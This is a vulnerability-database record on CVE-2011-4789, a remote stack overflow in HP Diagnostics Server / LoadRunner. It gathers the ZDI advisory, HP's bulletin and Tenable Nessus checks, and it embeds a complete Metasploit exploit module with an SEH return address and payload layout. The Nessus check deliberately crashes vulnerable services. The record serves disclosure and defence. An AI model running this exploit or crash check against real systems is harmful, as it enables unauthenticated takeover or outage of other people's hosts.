0x780c8f1f\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 12 2012'))\r\n\r\n\t\t\tregister_options([Opt::RPORT(23472)], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\treq = \"\\x00\\x00\\x00\\x00\"\r\n\t\treq << rand_text_alpha_upper(1092)\r\n\t\treq << generate_seh_payload(target.ret)\r\n\r\n\t\tconnect\r\n\t\tsock.put(req)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\r\n\tend\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18423/"}], "zdi": [{"lastseen": "2020-06-22T11:41:41", "bulletinFamily": "info", "cvelist": ["CVE-2011-4789"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Diagnostics server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way the HP Diagnostics server handles incomming packets with 0x00000000 as the first 32-bit value. The magentservice.exe process listens on port 23472 by default. It will eventually take that first dword, decrease it by one and use it as a size value to copy data into a stack buffer. The resulting stack-based buffer overflow can result in remote code execution under the system user.", "modified": "2012-06-22T00:00:00", "published": "2012-01-12T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-016/", "id": "ZDI-12-016", "title": "(0Day) HP Diagnostics Server magentservice.exe Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-13T00:37:15", "description": "This module exploits a stack buffer overflow in HP Diagnostics Server magentservice.exe service. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. 
Originally found and posted by AbdulAziz Harir via ZDI.\n", "published": "2012-01-25T18:04:30", "type": "metasploit", "title": "HP Diagnostics Server magentservice.exe Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4789"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_MAGENTSERVICE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP Diagnostics Server magentservice.exe Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HP Diagnostics Server\n magentservice.exe service. By sending a specially crafted packet, an attacker\n may be able to execute arbitrary code. Originally found and posted by\n AbdulAziz Harir via ZDI.\n },\n 'Author' =>\n [\n 'AbdulAziz Hariri', # Original discovery\n 'hal', # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['OSVDB', '72815'],\n ['CVE', '2011-4789'],\n ['ZDI', '12-016']\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n 'SSL' => true,\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'DefaultTarget' => 0,\n 'Targets' =>\n [\n [\n 'Diagnostics Server 9.10',\n {\n # pop esi # pop ebx # ret 10\n # magentservice.exe\n 'Ret' => 0x780c8f1f\n }\n ]\n ],\n 'DisclosureDate' => '2012-01-12'))\n\n register_options([Opt::RPORT(23472)])\n end\n\n def exploit\n\n req = \"\\x00\\x00\\x00\\x00\"\n req << rand_text_alpha_upper(1092)\n req << generate_seh_payload(target.ret)\n\n connect\n sock.put(req)\n\n handler\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, 
"sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/hp_magentservice.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-4789"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-016 : (0Day) HP Diagnostics Server magentservice.exe Remote\r\nCode Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-016\r\nJanuary 12, 2012\r\n\r\n- -- CVE ID:\r\nCVE-2011-4789\r\n\r\n- -- CVSS:\r\n10, AV:N/AC:L/Au:N/C:C/I:C/A:C\r\n\r\n- -- Affected Vendors:\r\n\r\nHewlett-Packard\r\n\r\n\r\n\r\n- -- Affected Products:\r\n\r\nHewlett-Packard Diagnostics Server\r\n\r\n\r\n\r\n- -- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of HP Diagnostics server. Authentication is not\r\nrequired to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the way the HP Diagnostics server\r\nhandles incoming packets with 0x00000000 as the first 32-bit value. The\r\nmagentservice.exe process listens on port 23472 by default. It will\r\neventually take that first dword, decrease it by one and use it as a\r\nsize value to copy data into a stack buffer. The resulting stack-based\r\nbuffer overflow can result in remote code execution under the system user.\r\n\r\n- -- Vendor Response:\r\n\r\n\r\n\r\n- -- Mitigation:\r\nHP states that a patch for this vulnerability will be made available to\r\nthe public "soon." 
Until that time, it is recommended that\r\nadministrators of Diagnostics Server enabled systems restrict access to\r\nport 23472 to trusted hosts only.\r\n\r\n\r\n- -- Disclosure Timeline:\r\n2011-06-03 - Vulnerability reported to vendor\r\n\r\n2012-01-12 - 0Day advisory released in accordance with the ZDI 180 day\r\ndeadline policy\r\n\r\n\r\n\r\n- -- Credit:\r\nThis vulnerability was discovered by:\r\n\r\n* AbdulAziz Hariri\r\n\r\n\r\n\r\n- -- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents\r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. 
Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n", "edition": 1, "modified": "2012-01-16T00:00:00", "published": "2012-01-16T00:00:00", "id": "SECURITYVULNS:DOC:27557", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27557", "title": "ZDI-12-016 : (0Day) HP Diagnostics Server magentservice.exe Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:45", "bulletinFamily": "software", "cvelist": ["CVE-2011-4789"], "description": "Buffer overflow on TCP/23472 request parsing", "edition": 1, "modified": "2012-06-03T00:00:00", "published": "2012-06-03T00:00:00", "id": "SECURITYVULNS:VULN:12143", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12143", "title": "HP Diagnostics Server buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:51", "bulletinFamily": 
"software", "cvelist": ["CVE-2011-4789", "CVE-2011-2328"], "description": "Few different buffer overflows.", "edition": 1, "modified": "2013-04-09T00:00:00", "published": "2013-04-09T00:00:00", "id": "SECURITYVULNS:VULN:12998", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12998", "title": "HP LoadRunner security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2011-4789", "CVE-2011-2328"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03216705\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03216705\r\nVersion: 2\r\n\r\nHPSBMU02785 SSRT100526 rev.2 - HP LoadRunner Running on Windows, Remote\r\nExecution of Arbitrary Code, Denial of Service (DoS)\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2013-04-04\r\nLast Updated: 2013-04-04\r\n\r\nPotential Security Impact: Remote execution of arbitrary code, Denial of\r\nService (DoS)\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP LoadRunner\r\nrunning on Windows. 
The vulnerability can be exploited remotely to execute\r\narbitrary code or cause a Denial of Service (DoS).\r\n\r\nReferences: CVE-2011-4789, ZDI-CAN-1259, ZDI-12-016\r\nSSRT100351, CVE-2011-2328, VU#987308\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP LoadRunner v11.00 before patch 4 running on Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2011-4789 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2011-2328 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided HP LoadRunner 11.00 patch 4 to resolve the vulnerability. The\r\npatch is available here: http://support.openview.hp.com/selfsolve/patches\r\n\r\nNote: ZDI-12-016 lists the vulnerable product as HP Diagnostics Server.\r\nHowever, the vulnerable product is actually HP LoadRunner.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 29 May 2012 Initial release\r\nVersion:2 (rev.2) - 04 April 2013 Added CVE-2011-2328 as also resolved with\r\nthis update\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin List: A list of HP Security Bulletins, updated\r\nperiodically, is contained in HP Security Notice HPSN-2011-001:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c02964430\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttp://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2013 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. 
The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlFdfqYACgkQ4B86/C0qfVmzogCePXQrBn8Z9l33Lexca2rsl17X\r\nVLYAn2M0IYffrJtgCummy2KJlJGn+/V1\r\n=tOUm\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2013-04-09T00:00:00", "published": "2013-04-09T00:00:00", "id": "SECURITYVULNS:DOC:29247", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29247", "title": "[security bulletin] HPSBMU02785 SSRT100526 rev.2 - HP LoadRunner Running on Windows, Remote Execution of Arbitrary Code, Denial of Service (DoS)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-03-01T03:31:06", "description": "The version of HP LoadRunner hosted on the remote Windows host is\npotentially affected by a code execution vulnerability. The application\nfails to properly handle incoming packets with '0x00000000' as the first\n32-bit value. A remote, unauthenticated attacker, exploiting this flaw,\ncould execute arbitrary code on the remote host subject to the\nprivileges of the user running the affected application. \n\nThis plugin sends crafted packets to the LoadRunner Agent service, which\nwill crash a vulnerable instance. 
If it is successful, a manual restart\nof the service is necessary.", "edition": 27, "published": "2012-11-13T00:00:00", "title": "HP LoadRunner < 11.00 Patch 4 Code Execution (intrusive check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4789"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:hp:loadrunner"], "id": "HP_LOADRUNNER_CVE-2011-4789.NASL", "href": "https://www.tenable.com/plugins/nessus/62902", "sourceData": "\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62902);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2011-4789\");\n script_bugtraq_id(51398);\n\n script_name(english:\"HP LoadRunner < 11.00 Patch 4 Code Execution (intrusive check)\");\n script_summary(english:\"Checks response from HP Load Runner Agent\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a software performance testing application\nthat is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HP LoadRunner hosted on the remote Windows host is\npotentially affected by a code execution vulnerability. The application\nfails to properly handle incoming packets with '0x00000000' as the first\n32-bit value. A remote, unauthenticated attacker, exploiting this flaw,\ncould execute arbitrary code on the remote host subject to the\nprivileges of the user running the affected application. \n\nThis plugin sends crafted packets to the LoadRunner Agent service, which\nwill crash a vulnerable instance. 
If it is successful, a manual restart\nof the service is necessary.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-016/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/522928/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b6425436\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to HP LoadRunner 11.00 Patch 4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP Diagnostics Server magentservice.exe Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:loadrunner\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies('loadrunner_agent_detect.nasl', 'ssl_supported_versions.nasl', 'os_fingerprint.nasl');\n script_require_keys('SSL/Supported');\n script_require_ports('Services/loadrunner_agent', 54345);\n \n 
exit(0);\n}\n\ninclude('audit.inc');\ninclude('byte_func.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\n\n#\n# HPSBMU02785 SSRT100526 says only HP LoadRunner running on Windows is affected\n#\nif (report_paranoia < 2)\n{\n os = get_kb_item_or_exit('Host/OS');\n if ('Windows' >!< os) audit(AUDIT_OS_NOT, 'Windows');\n}\n\nport = get_service(svc:'loadrunner_agent', default:54345, exit_on_fail:TRUE);\n\n# \n# The attack appears to work on SSLv3 only\n# Check for SSLv3 on remote port\nssl3 = 0;\nlist = get_kb_list('SSL/Transport/'+port);\nif (!isnull(list))\n{\n list = make_list(list);\n foreach encap (list)\n {\n if(encap == ENCAPS_SSLv3)\n {\n ssl3 = 1;\n break;\n }\n }\n}\n\nif (!ssl3) exit(0, 'The service listening on port '+port+' does not appear to support SSL 3.0.'); \n\nif (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port, 'TCP');\n\nsoc = open_sock_tcp(port, transport: ENCAPS_SSLv3);\nif (!soc) audit(AUDIT_SOCK_FAIL, port, 'TCP'); \n\n\nsend(socket:soc, data:'\\x00\\x00\\x00\\x00');\n# Wait a bit before closing the socket so that the remote end can read on a still open socket.\n# Closing the socket immediately after the send may cause SSL_Read() on the remote host to fail\n# because Nessus has just closed the connection. \nrecv(socket:soc, length:1024);\nclose(soc);\n\n# Vulnerable server should be dead now\nsoc = open_sock_tcp(port, transport: ENCAPS_SSLv3);\nif (!soc) security_hole(port:port);\n\n# We should be able to reconnect to the patched server\nelse audit(AUDIT_LISTEN_NOT_VULN, 'HP LoadRunner', port);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:31:05", "description": "The version of HP LoadRunner installed on the remote Windows host is\npotentially affected by a code execution vulnerability. The\napplication fails to properly handle incoming packets with \n'0x00000000' as the first 32-bit value. 
A remote, unauthenticated \nattacker, exploiting this flaw, could execute arbitrary code on the \nremote host subject to the privileges of the user running the affected\napplication.", "edition": 27, "published": "2012-06-26T00:00:00", "title": "HP LoadRunner < 11.00 Patch 4 Code Execution Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4789"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:hp:loadrunner"], "id": "HP_LOADRUNNER_11_PATCH4_CODE_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/59718", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59718);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2011-4789\");\n script_bugtraq_id(51398);\n\n script_name(english:\"HP LoadRunner < 11.00 Patch 4 Code Execution Vulnerability\");\n script_summary(english:\"Checks version of HP Load Runner\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a software performance testing \napplication that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HP LoadRunner installed on the remote Windows host is\npotentially affected by a code execution vulnerability. The\napplication fails to properly handle incoming packets with \n'0x00000000' as the first 32-bit value. 
A remote, unauthenticated \nattacker, exploiting this flaw, could execute arbitrary code on the \nremote host subject to the privileges of the user running the affected\napplication.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-016/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/522928/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to HP LoadRunner 11.00 Patch 4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP Diagnostics Server magentservice.exe Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:loadrunner\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"hp_loadrunner_installed.nasl\");\n script_require_keys(\"SMB/HP LoadRunner/Version\", \"SMB/HP LoadRunner/VersionUI\", \"SMB/HP LoadRunner/Path\");\n script_require_ports(139, 445);\n\n 
exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\napp = 'HP LoadRunner';\nversion = get_kb_item_or_exit('SMB/'+app+'/Version');\nverui = get_kb_item('SMB/'+app+'/VersionUI');\nif (isnull(verui))\n{\n ver = split(version, sep:'.', keep:FALSE);\n verui = ver[0] + '.' + ver[1] + '.0';\n}\n\nfix = '11.4.2021.0';\nif (ver_compare(ver:version, fix:fix) == -1)\n{\n if (report_verbosity > 0)\n {\n path = get_kb_item('SMB/'+app+'/Path');\n if (isnull(path)) path = 'n/a';\n report = \n '\\n Path : ' + path +\n '\\n Installed version : ' + verui +\n '\\n Fixed version : 11.4.0\\n';\n security_hole(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_hole(get_kb_item('SMB/transport'));\n exit(0);\n}\naudit(AUDIT_INST_VER_NOT_VULN, app, verui);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}